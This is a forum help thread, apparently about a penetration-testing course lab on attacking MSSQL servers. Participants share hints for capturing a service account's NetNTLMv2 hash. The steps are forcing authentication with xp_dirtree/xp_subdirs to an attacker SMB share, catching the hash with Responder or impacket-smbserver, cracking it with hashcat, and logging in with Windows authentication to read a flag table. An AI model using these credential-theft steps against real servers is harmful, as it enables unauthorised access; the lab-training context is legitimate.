ATTACKING COMMON SERVICES - SQL databases

Hi,
I’m having trouble getting into the flagDB database. I was able to get hash and password for the mssqlsvc user, but I cannot login. I found that the owner of flagDB is WINSRV02\Administrator. I think I need to find a hash for this user as well, but I am not sure how. I did not find anything in the accessible DBs.
Do you have any hint. please? Thanks!

Hi man did you find the way for the flagDB ?

To login with the user “mssqlsvc” you need to specify in the command that you want to use Windows authentication. In the cheatsheet is the command.

4 Likes

Thanks for the help. Not sure how we were meant to know how to do that from what’s provided in the course material? Seems a lot of these tasks are trial and error. Sqsh isn’t even installed on this box so used impackets mssqlclient as a work-around

Im stuck here as well.... I cant do nothing with the flagdb with mssqlsvc account…

Did anyone get this to work? I have mssqlsvc’s password and I understand I need to auth using windows, but can’t get mssqlclient.py or sqsh to work. Even tried dbeaver!

I don’t know what I’m doing wrong

Try this command mssqlclient.py <user>@<FQDN/IP> -windows-auth

4 Likes

brother i am facing problem while login with htbdbuser account
i am using this command :
mssqlclient.py -p 1433 htbdbuser@10.129.203.12 -windows-auth

[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

could you please help me !!

Think about when trying to authenticate to the sql server if you want to authenticate via the sql server or using windows authentication…

Sqsh didnt work for me so I used msqlclient.py…

Just add the -windows-auth flag to use windows authentication…

And it should let you access “flagDB”

Btw did you finish “Attacking SMB” ?

I can’t figure out how to ssh as the Jason user

I tried this command but it did not work for me.

I cracked the hash after getting it following the instructions. Read carefully each step and what commands to type in. The hashcat command I used to crack the hash, with the file beginning with “MSSQLSVC::WIN-02: etc” until the end of the numbers, was:

hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

because the hash is a NETNTLMv2, which corresponds to -m 5600 (discovered this after some personal research on hashcat.net under example hashes)

The log in error can be bypassed using instructions given in the guide, namely including the server name before the username or .\ before the username. To read the flag, I used sqsh:

1> USE flagDB;
2> SELECT * FROM tb_flag;
3> go

1 Like

Question: What is the password for the “mssqlsvc” user?

Logged in with : mssqlclient.py -p 1433 htbdbuser@(ip)
Checked tables of the master, tempdb, msdb databases but found nothing regarding this.

Where am i supposed to find the user and password tables in this?

You have to steal first the hash

how to get the hhash

use john

Hello lordangelus,

may i know how i can steal the hash, please?
Like IBlazeI, I checked all possible tables I have found but no luck.
Regards,

how did you find this password?
i also cant find it

It doesn’t work for me. responder is not picking up anything and the EXEC master…xp_dirtree '\ip\share' returns nothing. What i’m doing wrong?

In mine case also the responder didn’t work so I tried to use the Impacket-smbserver to get the hash and it worked. Use your IP(Attacker) while executing the EXEC master..xp_subdirs '\\<tun0ip>\share\' command. The information is mentioned in the “XP_SUBDIRS Hash Stealing with impacket” topic.

dump it using responder. check the article on how to do it